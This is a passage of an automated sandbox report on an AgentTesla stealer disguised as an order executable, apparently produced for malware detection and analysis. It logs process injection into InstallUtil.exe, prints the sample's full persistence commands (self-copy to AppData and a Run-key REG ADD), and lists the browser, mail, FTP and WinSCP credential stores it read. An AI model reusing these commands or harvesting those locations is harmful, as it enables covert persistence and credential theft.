                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 802000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 57C008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 442000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 671008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 340000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 342000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 380000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 382000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 51F008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 442000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 759008Jump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 18 > nul && copy "C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe" "C:\Users\user\AppData\Roaming\vexplorerez.exe" && ping 127.0.0.1 -n 18 > nul && "C:\Users\user\AppData\Roaming\vexplorerez.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\vexplorerez.exe "C:\Users\user\AppData\Roaming\vexplorerez.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\PABILOS MOTORES #5 Y 6.pdf"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\PABILOS MOTORES #5 Y 6.pdf"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 18 > nul && copy "c:\users\user\desktop\orden#46789_2024_optoflux_mexico_sderls.exe" "c:\users\user\appdata\roaming\vexplorerez.exe" && ping 127.0.0.1 -n 18 > nul && "c:\users\user\appdata\roaming\vexplorerez.exe"
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 18 > nul && copy "c:\users\user\desktop\orden#46789_2024_optoflux_mexico_sderls.exe" "c:\users\user\appdata\roaming\vexplorerez.exe" && ping 127.0.0.1 -n 18 > nul && "c:\users\user\appdata\roaming\vexplorerez.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeQueries volume information: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeQueries volume information: C:\Users\user\AppData\Roaming\vexplorerez.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeQueries volume information: C:\Users\user\AppData\Roaming\vexplorerez.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.47787c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.39bca32.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.46aceaa.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.4734a0a.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.4734a0a.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.46aceaa.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3d7cc32.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 24.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3bbb87a.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c433da.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e48548.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3d7cc32.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e48548.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3bbb87a.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.47787c0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a00802.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e04792.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c433da.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a00802.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e04792.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.39bca32.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.4064362259.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3865481800.0000000004734000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.4607747615.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.4607747615.000000000297E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3865481800.0000000004371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3865481800.0000000004652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2983258832.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.4607747615.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4064362259.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3511312688.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2983258832.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Orden#46789_2024_Optoflux_mexico_sderls.exe PID: 6524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vexplorerez.exe PID: 4000, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vexplorerez.exe PID: 7124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7608, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.47787c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.39bca32.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.46aceaa.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.4734a0a.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.4734a0a.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.46aceaa.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3d7cc32.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 24.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3bbb87a.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c433da.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e48548.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3d7cc32.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e48548.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3bbb87a.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.47787c0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a00802.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e04792.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c433da.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a00802.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e04792.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.39bca32.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.4064362259.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3865481800.0000000004734000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.4607747615.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3865481800.0000000004371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3865481800.0000000004652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2983258832.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4064362259.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3511312688.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2983258832.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Orden#46789_2024_Optoflux_mexico_sderls.exe PID: 6524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vexplorerez.exe PID: 4000, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vexplorerez.exe PID: 7124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7608, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.47787c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.39bca32.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.46aceaa.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.4734a0a.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.4734a0a.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.46aceaa.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3d7cc32.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 24.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3bbb87a.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c433da.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e48548.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3d7cc32.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e48548.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3bbb87a.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.47787c0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a00802.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e04792.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c433da.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a00802.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e04792.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.39bca32.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.4064362259.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3865481800.0000000004734000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.4607747615.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.4607747615.000000000297E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3865481800.0000000004371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3865481800.0000000004652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2983258832.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.4607747615.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4064362259.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3511312688.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2983258832.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Orden#46789_2024_Optoflux_mexico_sderls.exe PID: 6524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vexplorerez.exe PID: 4000, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vexplorerez.exe PID: 7124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7608, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts                    		231
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts12
                    Command and Scripting Interpreter                    		1
                    Valid Accounts                    		1
